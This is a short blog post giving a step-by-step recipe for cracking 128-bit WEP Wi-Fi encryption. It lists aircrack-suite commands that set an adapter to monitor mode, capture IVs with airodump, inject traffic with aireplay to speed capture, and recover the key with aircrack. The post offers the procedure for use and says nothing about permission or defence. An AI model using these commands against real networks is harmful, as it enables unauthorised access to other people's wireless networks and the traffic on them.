Cracking 128-bit WEP in 15 minutes

Ones said that cracking WEP is easy, especially when you are on Linux. I tried myself with unsuccessful because I couldn't remember the steps. Anyway, it is very easy to follow a screencast (or from ) I found last week. The screencast in YouTube is not as good as it should because of higher degree of compression so I recommend you to see the another one in WMV.

The step is as follows.

  1. Set your wireless adapter to monitor mode

    iwconfig wlan0 mode monitor
  2. Run airodump to capture IVs

    airodump wlan0 /tmp/dump
  3. Run aireplay to capture IVs faster

    aireplay -2 wlan0
  4. Wait 13 minutes

  5. Crack with aircrack

    aircrack /tmp/dump-01.cap

You may also see other screencasts , and .

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